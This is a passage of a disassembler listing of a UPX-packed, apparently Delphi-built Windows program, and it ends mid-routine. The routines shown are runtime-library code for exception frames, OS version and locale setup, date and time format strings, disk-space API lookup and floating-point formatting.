; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_407FF8 proc near ; CODE XREF: UPX0:00402E7F�p
; DATA XREF: sub_408008+67�o ...
call sub_40788C
mov eax, 1
call sub_4031B0
sub_407FF8 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408008 proc near ; CODE XREF: UPX0:loc_409502�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push 0
xor eax, eax
push ebp
push offset loc_4080C9
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_4]
mov eax, off_40B35C
call sub_40478C
mov ecx, [ebp+var_4]
mov dl, 1
mov eax, off_405B6C
call sub_407904
mov dword_40C5FC, eax
lea edx, [ebp+var_8]
mov eax, off_40B3EC
call sub_40478C
mov ecx, [ebp+var_8]
mov dl, 1
mov eax, off_405FF4
call sub_407904
mov dword_40C600, eax
mov eax, off_40B324
mov dword ptr [eax], offset sub_407B84
mov eax, off_40B388
mov dword ptr [eax], offset sub_407FF8
mov eax, off_40B34C
mov edx, off_405AA8
mov [eax], edx
mov eax, off_40B380
mov dword ptr [eax], offset loc_407D4C
mov eax, off_40B38C
mov dword ptr [eax], offset sub_407F2C
mov eax, off_40B3FC
mov dword ptr [eax], offset sub_407C84
mov eax, off_40B318
mov dword ptr [eax], offset sub_407CA0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4080D0
loc_4080BB: ; CODE XREF: sub_408008+C6�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_4031EC
retn
; ---------------------------------------------------------------------------
loc_4080C9: ; DATA XREF: sub_408008+A�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_4080BB
; ---------------------------------------------------------------------------
loc_4080D0: ; CODE XREF: sub_408008+C0�j
; DATA XREF: sub_408008+AE�o
pop ecx
pop ecx
pop ebp
retn
sub_408008 endp
; =============== S U B R O U T I N E =======================================
sub_4080D4 proc near ; CODE XREF: UPX0:004093A8�p
mov eax, dword_40C5FC
mov byte ptr [eax+0Ch], 1
mov eax, dword_40C5FC
mov edx, [eax]
call dword ptr [edx-8]
xor eax, eax
mov dword_40C5FC, eax
mov eax, dword_40C600
mov byte ptr [eax+0Ch], 1
mov eax, dword_40C600
call sub_4028F4
xor eax, eax
mov dword_40C600, eax
mov eax, off_40B324
xor edx, edx
mov [eax], edx
mov eax, off_40B388
xor edx, edx
mov [eax], edx
mov eax, off_40B34C
xor edx, edx
mov [eax], edx
mov eax, off_40B380
xor edx, edx
mov [eax], edx
mov eax, off_40B38C
xor edx, edx
mov [eax], edx
mov eax, off_40B3FC
xor edx, edx
mov [eax], edx
retn
sub_4080D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408140 proc near ; CODE XREF: UPX0:0040950C�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
add esp, 0FFFFFF6Ch
mov [esp+94h+var_94], 94h
push esp
call sub_405720 ; GetVersionExA
test eax, eax
jz short loc_40818E
mov eax, [esp+94h+var_84]
mov dword_40B0C4, eax
mov eax, [esp+94h+var_90]
mov dword_40B0C8, eax
mov eax, [esp+94h+var_8C]
mov dword_40B0CC, eax
mov eax, [esp+94h+var_88]
mov dword_40B0D0, eax
mov eax, offset dword_40B0D4
lea edx, [esp+94h+var_80]
mov ecx, 80h
call sub_4033F8
loc_40818E: ; CODE XREF: sub_408140+15�j
add esp, 94h
retn
sub_408140 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_408198 proc near ; CODE XREF: sub_408210+1B�p
; sub_408234+B�p
push esi
push edi
mov edi, edx
xor edx, edx
test eax, eax
jz short loc_408208
cmp byte ptr [eax+edi], 0
jz short loc_408208
test edi, edi
jnz short loc_4081C0
mov al, [eax]
and eax, 0FFh
bt dword_40B108, eax
jnb short loc_408208
mov dl, 1
jmp short loc_408208
; ---------------------------------------------------------------------------
loc_4081C0: ; CODE XREF: sub_408198+12�j
mov esi, edi
dec esi
jmp short loc_4081C6
; ---------------------------------------------------------------------------
loc_4081C5: ; CODE XREF: sub_408198+42�j
dec esi
loc_4081C6: ; CODE XREF: sub_408198+2B�j
test esi, esi
jl short loc_4081DC
mov cl, [eax+esi]
and ecx, 0FFh
bt dword_40B108, ecx
jb short loc_4081C5
loc_4081DC: ; CODE XREF: sub_408198+30�j
mov ecx, edi
sub ecx, esi
and ecx, 80000001h
jns short loc_4081ED
dec ecx
or ecx, 0FFFFFFFEh
inc ecx
loc_4081ED: ; CODE XREF: sub_408198+4E�j
test ecx, ecx
jnz short loc_4081F5
mov dl, 2
jmp short loc_408208
; ---------------------------------------------------------------------------
loc_4081F5: ; CODE XREF: sub_408198+57�j
mov al, [eax+edi]
and eax, 0FFh
bt dword_40B108, eax
jnb short loc_408208
mov dl, 1
loc_408208: ; CODE XREF: sub_408198+8�j
; sub_408198+E�j ...
mov eax, edx
pop edi
pop esi
retn
sub_408198 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408210 proc near ; CODE XREF: sub_406654+1A�p
; sub_406684+37�p ...
push ebx
push esi
mov esi, edx
mov ebx, eax
xor eax, eax
cmp byte ptr dword_40C5B8, 0
jz short loc_408230
mov eax, ebx
call sub_403534
mov edx, esi
dec edx
call sub_408198
loc_408230: ; CODE XREF: sub_408210+F�j
pop esi
pop ebx
retn
sub_408210 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_408234 proc near ; CODE XREF: sub_406924+1B�p
; sub_4082E8+1C�p
xor ecx, ecx
cmp byte ptr dword_40C5B8, 0
jz short loc_408246
call sub_408198
mov ecx, eax
loc_408246: ; CODE XREF: sub_408234+9�j
mov eax, ecx
retn
sub_408234 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40824C proc near ; CODE XREF: sub_408280+1A�p
push ebx
push esi
mov ebx, edx
mov esi, eax
test ebx, ebx
jle short loc_408275
mov eax, esi
call sub_403424
cmp ebx, eax
jg short loc_408275
cmp byte ptr [esi+ebx-1], 5Ch
jnz short loc_408275
mov edx, ebx
mov eax, esi
call sub_408210
test al, al
jz short loc_40827A
loc_408275: ; CODE XREF: sub_40824C+8�j
; sub_40824C+13�j ...
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40827A: ; CODE XREF: sub_40824C+27�j
mov al, 1
pop esi
pop ebx
retn
sub_40824C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408280 proc near ; CODE XREF: sub_40AC70+F3�p
push ebx
push esi
mov ebx, edx
mov esi, eax
mov eax, ebx
mov edx, esi
call sub_40321C
mov eax, [ebx]
call sub_403424
mov edx, eax
mov eax, [ebx]
call sub_40824C
test al, al
jnz short loc_4082AF
mov eax, ebx
mov edx, offset dword_4082BC
call sub_40342C
loc_4082AF: ; CODE XREF: sub_408280+21�j
pop esi
pop ebx
retn
sub_408280 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_4082BC dd 5Ch
; =============== S U B R O U T I N E =======================================
sub_4082C0 proc near ; CODE XREF: sub_407704+7E�p
push ebx
push esi
mov ebx, edx
mov edx, ebx
call sub_4082E8
mov esi, eax
test bl, bl
jz short loc_4082E3
test eax, eax
jz short loc_4082E3
loc_4082D5: ; CODE XREF: sub_4082C0+21�j
mov esi, eax
inc eax
mov edx, ebx
call sub_4082E8
test eax, eax
jnz short loc_4082D5
loc_4082E3: ; CODE XREF: sub_4082C0+F�j
; sub_4082C0+13�j
mov eax, esi
pop esi
pop ebx
retn
sub_4082C0 endp
; =============== S U B R O U T I N E =======================================
sub_4082E8 proc near ; CODE XREF: sub_4082C0+6�p
; sub_4082C0+1A�p
push ebx
push esi
push edi
mov ebx, edx
mov esi, eax
mov edx, ebx
mov eax, esi
call sub_406904
mov edi, eax
test edi, edi
jz short loc_408322
loc_4082FE: ; CODE XREF: sub_4082E8+38�j
mov edx, edi
sub edx, esi
mov eax, esi
call sub_408234
sub al, 1
jb short loc_408322
jz short loc_408311
jmp short loc_408312
; ---------------------------------------------------------------------------
loc_408311: ; CODE XREF: sub_4082E8+25�j
inc edi
loc_408312: ; CODE XREF: sub_4082E8+27�j
inc edi
mov edx, ebx
mov eax, edi
call sub_406904
mov edi, eax
test edi, edi
jnz short loc_4082FE
loc_408322: ; CODE XREF: sub_4082E8+14�j
; sub_4082E8+23�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_4082E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=20h
sub_408328 proc near ; CODE XREF: sub_4083E0+1E�p
var_44 = byte ptr -44h
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFE8h
mov edi, offset dword_40B108
lea ebp, [esp+4]
mov esi, offset dword_40C5B0
mov dword ptr [esi], 409h
mov word ptr [esi+4], 9
mov word ptr [esi+6], 1
call sub_405718 ; GetThreadLocale
test eax, eax
jz short loc_40835A
mov [esi], eax
loc_40835A: ; CODE XREF: sub_408328+2E�j
test ax, ax
jz short loc_408374
mov edx, eax
and dx, 3FFh
mov [esi+4], dx
movzx eax, ax
shr eax, 0Ah
mov [esi+6], ax
loc_408374: ; CODE XREF: sub_408328+35�j
push 4Ah
call sub_405768 ; GetSystemMetrics
test eax, eax
setnz al
mov [esi+9], al
push 2Ah
call sub_405768 ; GetSystemMetrics
test eax, eax
setnz bl
mov [esi+8], bl
test bl, bl
jz short loc_4083D6
push ebp
push 0
call sub_4056D0 ; GetCPInfo
xor esi, esi
jmp short loc_4083C7
; ---------------------------------------------------------------------------
loc_4083A2: ; CODE XREF: sub_408328+AC�j
mov al, [ebp+esi+20h+var_1A]
mov bl, [ebp+esi+20h+var_19]
sub bl, al
jb short loc_4083C4
inc ebx
mov [esp+24h+var_44], al
loc_4083B2: ; CODE XREF: sub_408328+9A�j
mov al, [esp+24h+var_44]
and eax, 0FFh
bts [edi], eax
inc [esp+24h+var_44]
dec bl
jnz short loc_4083B2
loc_4083C4: ; CODE XREF: sub_408328+84�j
add esi, 2
loc_4083C7: ; CODE XREF: sub_408328+78�j
cmp esi, 0Ch
jge short loc_4083D6
mov al, [ebp+esi+20h+var_1A]
or al, [ebp+esi+20h+var_19]
jnz short loc_4083A2
loc_4083D6: ; CODE XREF: sub_408328+6C�j
; sub_408328+A2�j
add esp, 18h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_408328 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083E0 proc near ; CODE XREF: UPX0:00409507�p
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov ecx, 8
loc_4083E8: ; CODE XREF: sub_4083E0+D�j
push 0
push 0
dec ecx
jnz short loc_4083E8
push ebx
xor eax, eax
push ebp
push offset loc_4086AB
push dword ptr fs:[eax]
mov fs:[eax], esp
call sub_408328
call sub_407250
cmp byte ptr dword_40C5B8, 0
jz short loc_408416
call sub_407428
loc_408416: ; CODE XREF: sub_4083E0+2F�j
call sub_405718 ; GetThreadLocale
mov ebx, eax
lea eax, [ebp+var_10]
push eax
xor ecx, ecx
mov edx, 14h
mov eax, ebx
call sub_4071A0
mov edx, [ebp+var_10]
mov eax, offset dword_40C4F0
call sub_40321C
lea eax, [ebp+var_14]
push eax
mov ecx, offset dword_4086C0
mov edx, 1Bh
mov eax, ebx
call sub_4071A0
mov eax, [ebp+var_14]
xor edx, edx
call sub_406508
mov byte_40C4F4, al
lea eax, [ebp+var_18]
push eax
mov ecx, offset dword_4086C0
mov edx, 1Ch
mov eax, ebx
call sub_4071A0
mov eax, [ebp+var_18]
xor edx, edx
call sub_406508
mov byte_40C4F5, al
mov cl, 2Ch
mov edx, 0Fh
mov eax, ebx
call sub_4071EC
mov byte_40C4F6, al
mov cl, 2Eh
mov edx, 0Eh
mov eax, ebx
call sub_4071EC
mov byte_40C4F7, al
lea eax, [ebp+var_1C]
push eax
mov ecx, offset dword_4086C0
mov edx, 19h
mov eax, ebx
call sub_4071A0
mov eax, [ebp+var_1C]
xor edx, edx
call sub_406508
mov byte_40C4F8, al
mov cl, 2Fh
mov edx, 1Dh
mov eax, ebx
call sub_4071EC
mov byte_40C4F9, al
lea eax, [ebp+var_24]
push eax
mov ecx, offset dword_4086CC
mov edx, 1Fh
mov eax, ebx
call sub_4071A0
mov eax, [ebp+var_24]
lea edx, [ebp+var_20]
call sub_4074D8
mov edx, [ebp+var_20]
mov eax, offset dword_40C4FC
call sub_40321C
lea eax, [ebp+var_2C]
push eax
mov ecx, offset dword_4086DC
mov edx, 20h
mov eax, ebx
call sub_4071A0
mov eax, [ebp+var_2C]
lea edx, [ebp+var_28]
call sub_4074D8
mov edx, [ebp+var_28]
mov eax, offset dword_40C500
call sub_40321C
mov cl, 3Ah
mov edx, 1Eh
mov eax, ebx
call sub_4071EC
mov byte_40C504, al
lea eax, [ebp+var_30]
push eax
mov ecx, offset dword_4086F4
mov edx, 28h
mov eax, ebx
call sub_4071A0
mov edx, [ebp+var_30]
mov eax, offset dword_40C508
call sub_40321C
lea eax, [ebp+var_34]
push eax
mov ecx, offset dword_408700
mov edx, 29h
mov eax, ebx
call sub_4071A0
mov edx, [ebp+var_34]
mov eax, offset dword_40C50C
call sub_40321C
lea eax, [ebp+var_8]
call sub_4031C8
lea eax, [ebp+var_C]
call sub_4031C8
lea eax, [ebp+var_38]
push eax
mov ecx, offset dword_4086C0
mov edx, 25h
mov eax, ebx
call sub_4071A0
mov eax, [ebp+var_38]
xor edx, edx
call sub_406508
test eax, eax
jnz short loc_4085D4
lea eax, [ebp+var_4]
mov edx, offset dword_40870C
call sub_403260
jmp short loc_4085E1
; ---------------------------------------------------------------------------
loc_4085D4: ; CODE XREF: sub_4083E0+1E3�j
lea eax, [ebp+var_4]
mov edx, offset dword_408718
call sub_403260
loc_4085E1: ; CODE XREF: sub_4083E0+1F2�j
lea eax, [ebp+var_3C]
push eax
mov ecx, offset dword_4086C0
mov edx, 23h
mov eax, ebx
call sub_4071A0
mov eax, [ebp+var_3C]
xor edx, edx
call sub_406508
test eax, eax
jnz short loc_408643
lea eax, [ebp+var_40]
push eax
mov ecx, offset dword_4086C0
mov edx, 1005h
mov eax, ebx
call sub_4071A0
mov eax, [ebp+var_40]
xor edx, edx
call sub_406508
test eax, eax
jnz short loc_408636
lea eax, [ebp+var_C]
mov edx, offset dword_408724
call sub_403260
jmp short loc_408643
; ---------------------------------------------------------------------------
loc_408636: ; CODE XREF: sub_4083E0+245�j
lea eax, [ebp+var_8]
mov edx, offset dword_408734
call sub_403260
loc_408643: ; CODE XREF: sub_4083E0+222�j
; sub_4083E0+254�j
push [ebp+var_8]
push [ebp+var_4]
push offset dword_408744
push [ebp+var_C]
mov eax, offset dword_40C510
mov edx, 4
call sub_4034E4
push [ebp+var_8]
push [ebp+var_4]
push offset dword_408750
push [ebp+var_C]
mov eax, offset dword_40C514
mov edx, 4
call sub_4034E4
mov cl, 2Ch
mov edx, 0Ch
mov eax, ebx
call sub_4071EC
mov byte_40C5F4, al
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4086B2
loc_40869D: ; CODE XREF: sub_4083E0+2D0�j
lea eax, [ebp+var_40]
mov edx, 10h
call sub_4031EC
retn
; ---------------------------------------------------------------------------
loc_4086AB: ; DATA XREF: sub_4083E0+13�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40869D
; ---------------------------------------------------------------------------
loc_4086B2: ; CODE XREF: sub_4083E0+2CA�j
; DATA XREF: sub_4083E0+2B8�o
pop ebx
mov esp, ebp
pop ebp
retn
sub_4083E0 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_4086C0 dd 30h, 0FFFFFFFFh, 6 ; sub_4083E0+84�o ...
dword_4086CC dd 2F642F6Dh, 7979h, 0FFFFFFFFh, 0Chdword_4086DC dd 6D6D6D6Dh, 202C6420h, 79797979h, 0 dd 0FFFFFFFFh, 2
dword_4086F4 dd 6D61h, 0FFFFFFFFh, 2dword_408700 dd 6D70h, 0FFFFFFFFh, 1dword_40870C dd 68h, 0FFFFFFFFh, 2dword_408718 dd 6868h, 0FFFFFFFFh, 5dword_408724 dd 504D4120h, 4Dh, 0FFFFFFFFh, 5dword_408734 dd 4D504D41h, 20h, 0FFFFFFFFh, 3dword_408744 dd 6D6D3Ah, 0FFFFFFFFh, 6dword_408750 dd 3A6D6D3Ah, 7373h
; =============== S U B R O U T I N E =======================================
sub_408758 proc near ; CODE XREF: UPX0:004093A3�p
push ebx
mov ebx, offset dword_40B2B8
jmp short loc_408770
; ---------------------------------------------------------------------------
loc_408760: ; CODE XREF: sub_408758+1B�j
mov eax, [ebx]
mov edx, [eax]
mov [ebx], edx
mov edx, 8
call sub_40256C
loc_408770: ; CODE XREF: sub_408758+6�j
cmp dword ptr [ebx], 0
jnz short loc_408760
pop ebx
retn
sub_408758 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_408778 proc near ; CODE XREF: UPX0:00409511�p
push ebx
push offset dword_4087B0
call sub_405708 ; GetModuleHandleA
mov ebx, eax
test ebx, ebx
jz short loc_408799
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push ebx
call sub_405710 ; GetProcAddress
mov dword_40B12C, eax
loc_408799: ; CODE XREF: sub_408778+F�j
cmp dword_40B12C, 0
jnz short loc_4087AC
mov eax, offset sub_406754
mov dword_40B12C, eax
loc_4087AC: ; CODE XREF: sub_408778+28�j
pop ebx
retn
sub_408778 endp
; ---------------------------------------------------------------------------
align 10h
dword_4087B0 dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_408778+11�o
; =============== S U B R O U T I N E =======================================
sub_4087D4 proc near ; CODE XREF: UPX0:0040939E�p
mov edx, [eax]
xor ecx, ecx
mov [eax], ecx
mov eax, edx
call sub_4028F4
retn
sub_4087D4 endp
; ---------------------------------------------------------------------------
align 4
dword_4087E4 dd 1Dh, 40B2B4h, 40B400h, 40B2ACh, 40B3B4h, 40B2A4h, 40B31Ch
; DATA XREF: UPX0:004094D6�o
dd 40B29Ch, 40B418h, 40B294h, 40B430h, 40B28Ch, 40B37Ch
dd 40B284h, 40B3ACh, 40B27Ch, 40B2FCh, 40B274h, 40B3BCh
dd 40B26Ch, 40B3D0h, 40B264h, 40B394h, 40B25Ch, 40B398h
dd 40B254h, 40B460h, 40B24Ch, 40B458h, 40B244h, 40B47Ch
dd 40B23Ch, 40B3F4h, 40B234h, 40B3E4h, 40B22Ch, 40B480h
dd 40B224h, 40B470h, 40B21Ch, 40B3A4h, 40B214h, 40B464h
dd 40B20Ch, 40B468h, 40B204h, 40B364h, 40B1FCh, 40B33Ch
dd 40B1F4h, 40B3E0h, 40B1ECh, 40B414h, 40B1E4h, 40B300h
dd 40B1DCh, 40B45Ch, 40B1D4h, 40B3A0h
dword_4088D0 dd 28h, 40B1CCh, 40B44Ch, 0 dd offset off_40B1C8
dd offset off_40B320
dd 0
dd offset off_40B1C4
dd offset off_40B408
align 8
dd offset off_40B1C0
dd offset off_40B30C
dd 0
dd offset off_40B1BC
dd offset off_40B348
align 10h
dd offset off_40B1B8
dd offset off_40B340
dd 0
dd offset off_40B1B4
dd offset off_40B328
align 8
dd offset off_40B1B0
dd offset off_40B39C
dd 0
dd offset off_40B1AC
dd offset off_40B3F0
align 10h
dd offset off_40B1A8
dd offset off_40B344
dd 0
dd offset off_40B1A4
dd offset off_40B3DC
align 8
dd offset off_40B1A0
dd offset off_40B42C
dd 0
dd offset off_40B19C
dd offset off_40B420
align 10h
dd offset off_40B198
dd offset off_40B3F8
dd 0
dd offset off_40B194
dd offset off_40B390
dd 0
dd offset off_40B190
dd offset off_40B378
dd 0
dd offset off_40B18C
dd offset off_40B308
align 10h
dd offset off_40B188
dd offset off_40B41C
dd 0
dd offset off_40B184
dd offset off_40B3CC
align 8
dd offset off_40B180
dd offset off_40B370
dd 0
dd offset off_40B17C
dd offset off_40B3B8
align 10h
dd offset off_40B178
dd offset off_40B3E8
dd 0
dd offset off_40B174
dd offset off_40B3C8
align 8
dd offset off_40B170
dd offset off_40B384
dd 0
dd offset off_40B16C
dd offset off_40B304
align 10h
dd offset off_40B168
dd offset off_40B3B0
dd 0
dd offset off_40B164
dd offset off_40B46C
align 8
dd offset off_40B160
dd offset off_40B448
dd 0
dd offset off_40B15C
dd offset off_40B3D8
align 10h
dd offset off_40B158
dd offset off_40B360
dd 0
dd offset off_40B154
dd offset off_40B314
align 8
dd offset off_40B150
dd offset off_40B440
dd 0
dd offset off_40B14C
dd offset off_40B488
align 10h
dd offset off_40B148
dd offset off_40B330
dd 0
dd offset off_40B144
dd offset off_40B2F8
align 8
dd offset off_40B140
dd offset off_40B454
dd 0
dd offset off_40B13C
dd offset off_40B3D4
align 10h
dd offset off_40B138
dd offset off_40B474
dd 0
dd offset off_40B134
dd offset off_40B3A8
align 8
dd offset off_40B130
dd offset off_40B368
flt_408AB0 dd 0.0 ; DATA XREF: sub_4091A7+5D�r
dword_408AB4 dd 0Ah ; sub_4090A0+70�r ...
dd 64h, 3E8h, 2710h
tbyte_408AC4 dt 1.0e18 ; DATA XREF: sub_4090A0+5B�r
word_408ACE dw 133Fh ; DATA XREF: UPX0:0040928E�r
dword_408AD0 dd 4E464E49h ; ---------------------------------------------------------------------------
inc ecx
dec esi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408AD6 proc near ; CODE XREF: sub_406AC7+2A7�p
; UPX0:00408E41�p
var_1C = word ptr -1Ch
var_19 = byte ptr -19h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push edi
push esi
push ebx
mov [ebp+var_4], eax
mov eax, 13h
cmp cl, 0
jnz short loc_408B03
mov eax, [ebp+arg_4]
cmp eax, 2
jge short loc_408AF9
mov eax, 2
loc_408AF9: ; CODE XREF: sub_408AD6+1C�j
cmp eax, 12h
jle short loc_408B03
mov eax, 12h
loc_408B03: ; CODE XREF: sub_408AD6+14�j
; sub_408AD6+26�j
mov [ebp+arg_4], eax
push eax
mov eax, 270Fh
cmp [ebp+arg_8], 2
jb short loc_408B15
mov eax, [ebp+arg_0]
loc_408B15: ; CODE XREF: sub_408AD6+3A�j
push eax
lea eax, [ebp+var_1C]
call sub_409079
mov edi, [ebp+var_4]
movzx eax, [ebp+var_1C]
sub eax, 7FFFh
cmp eax, 2
jnb short loc_408B46
mov ecx, eax
call sub_408B94
lea esi, dword_408AD0[ecx+ecx*2]
mov ecx, 3
rep movsb
jmp short loc_408B69
; ---------------------------------------------------------------------------
loc_408B46: ; CODE XREF: sub_408AD6+57�j
lea esi, [ebp+var_19]
movzx ebx, [ebp+arg_8]
cmp bl, 1
jz short loc_408B62
cmp bl, 4
ja short loc_408B60
movsx eax, [ebp+var_1C]
cmp eax, [ebp+arg_4]
jle short loc_408B62
loc_408B60: ; CODE XREF: sub_408AD6+7F�j
mov bl, 0
loc_408B62: ; CODE XREF: sub_408AD6+7A�j
; sub_408AD6+88�j
call off_408B77[ebx*4]
loc_408B69: ; CODE XREF: sub_408AD6+6E�j
mov eax, edi
sub eax, [ebp+var_4]
pop ebx
pop esi
pop edi
mov esp, ebp
pop ebp
retn 0Ch
sub_408AD6 endp
; ---------------------------------------------------------------------------
off_408B77 dd offset sub_408B9E ; DATA XREF: sub_408AD6:loc_408B62�r
dd offset sub_408C00
dd offset sub_408C73
dd offset sub_408C73
dd offset sub_408CD9
; =============== S U B R O U T I N E =======================================
sub_408B8B proc near ; CODE XREF: sub_408C00+5�p
; sub_408C00:loc_408C16�p ...
lodsb
or al, al
jnz short locret_408B93
mov al, 30h
dec esi
locret_408B93: ; CODE XREF: sub_408B8B+3�j
retn
sub_408B8B endp
; =============== S U B R O U T I N E =======================================
sub_408B94 proc near ; CODE XREF: sub_408AD6+5B�p
; sub_408B9E�p ...
cmp byte ptr [ebp-1Ah], 0
jz short locret_408B9D
mov al, 2Dh
stosb
locret_408B9D: ; CODE XREF: sub_408B94+4�j
retn
sub_408B94 endp
; =============== S U B R O U T I N E =======================================
sub_408B9E proc near ; CODE XREF: sub_408AD6:loc_408B62�p
; DATA XREF: UPX0:off_408B77�o
call sub_408B94
movsx ecx, word ptr [ebp-1Ch]
xor edx, edx
cmp ecx, [ebp+0Ch]
jg short loc_408BCD
cmp ecx, 0FFFFFFFDh
jl short loc_408BCD
or ecx, ecx
jg short loc_408BD3
mov al, 30h
stosb
cmp byte ptr [esi], 0
jz short locret_408BFF
mov al, byte_40C4F7
stosb
neg ecx
mov al, 30h
rep stosb
jmp short loc_408BE9
; ---------------------------------------------------------------------------
loc_408BCD: ; CODE XREF: sub_408B9E+E�j
; sub_408B9E+13�j
mov ecx, 1
inc edx
loc_408BD3: ; CODE XREF: sub_408B9E+17�j
; sub_408B9E+3B�j
lodsb
or al, al
jz short loc_408BF1
stosb
loop loc_408BD3
lodsb
or al, al
jz short loc_408BF5
mov ah, al
mov al, byte_40C4F7
stosw
loc_408BE9: ; CODE XREF: sub_408B9E+2D�j
; sub_408B9E+51�j
lodsb
or al, al
jz short loc_408BF5
stosb
jmp short loc_408BE9
; ---------------------------------------------------------------------------
loc_408BF1: ; CODE XREF: sub_408B9E+38�j
mov al, 30h
rep stosb
loc_408BF5: ; CODE XREF: sub_408B9E+40�j
; sub_408B9E+4E�j
or edx, edx
jz short locret_408BFF
xor eax, eax
xor ecx, ecx
jmp short loc_408C2A
; ---------------------------------------------------------------------------
locret_408BFF: ; CODE XREF: sub_408B9E+1F�j
; sub_408B9E+59�j
retn
sub_408B9E endp
; =============== S U B R O U T I N E =======================================
sub_408C00 proc near ; CODE XREF: sub_408AD6:loc_408B62�p
; DATA XREF: UPX0:00408B7B�o
call sub_408B94
call sub_408B8B
mov ah, byte_40C4F7
stosw
mov ecx, [ebp+0Ch]
dec ecx
loc_408C16: ; CODE XREF: sub_408C00+1C�j
call sub_408B8B
stosb
loop loc_408C16
mov ah, 2Bh
mov ecx, [ebp+8]
cmp ecx, 4
jb short loc_408C2A
xor ecx, ecx
loc_408C2A: ; CODE XREF: sub_408B9E+5F�j
; sub_408C00+26�j
mov al, 45h
mov bl, [ebp-19h]
movsx edx, word ptr [ebp-1Ch]
dec edx
sub_408C00 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_408C34 proc near ; CODE XREF: sub_408F58+AD�p
stosb
or bl, bl
jnz short loc_408C3D
xor edx, edx
jmp short loc_408C47
; ---------------------------------------------------------------------------
loc_408C3D: ; CODE XREF: sub_408C34+3�j
or edx, edx
jge short loc_408C47
mov al, 2Dh
neg edx
jmp short loc_408C4D
; ---------------------------------------------------------------------------
loc_408C47: ; CODE XREF: sub_408C34+7�j
; sub_408C34+B�j
or ah, ah
jz short loc_408C4E
mov al, ah
loc_408C4D: ; CODE XREF: sub_408C34+11�j
stosb
loc_408C4E: ; CODE XREF: sub_408C34+15�j
xchg eax, edx
push eax
mov ebx, esp
loc_408C52: ; CODE XREF: sub_408C34+2F�j
; sub_408C34+33�j
xor edx, edx
div dword_408AB4
add dl, 30h
mov [ebx], dl
inc ebx
dec ecx
or eax, eax
jnz short loc_408C52
or ecx, ecx
jg short loc_408C52
loc_408C69: ; CODE XREF: sub_408C34+3B�j
dec ebx
mov al, [ebx]
stosb
cmp ebx, esp
jnz short loc_408C69
pop eax
retn
sub_408C34 endp
; =============== S U B R O U T I N E =======================================
sub_408C73 proc near ; CODE XREF: sub_408AD6:loc_408B62�p
; DATA XREF: UPX0:00408B7F�o ...
call sub_408B94
sub_408C73 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_408C78 proc near ; CODE XREF: sub_408CD9:loc_408D25�p
mov edx, [ebp+8]
cmp edx, 12h
jb short loc_408C85
mov edx, 12h
loc_408C85: ; CODE XREF: sub_408C78+6�j
movsx ecx, word ptr [ebp-1Ch]
or ecx, ecx
jg short loc_408C92
mov al, 30h
stosb
jmp short loc_408CBA
; ---------------------------------------------------------------------------
loc_408C92: ; CODE XREF: sub_408C78+13�j
xor ebx, ebx
cmp byte ptr [ebp+10h], 2
jz short loc_408CA4
mov eax, ecx
dec eax
mov bl, 3
div bl
mov bl, ah
inc ebx
loc_408CA4: ; CODE XREF: sub_408C78+20�j
; sub_408C78+36�j ...
call sub_408B8B
stosb
dec ecx
jz short loc_408CBA
dec ebx
jnz short loc_408CA4
mov al, byte_40C4F6
stosb
mov bl, 3
jmp short loc_408CA4
; ---------------------------------------------------------------------------
loc_408CBA: ; CODE XREF: sub_408C78+18�j
; sub_408C78+33�j
or edx, edx
jz short locret_408CD8
mov al, byte_40C4F7
stosb
jecxz short loc_408CCF
mov al, 30h
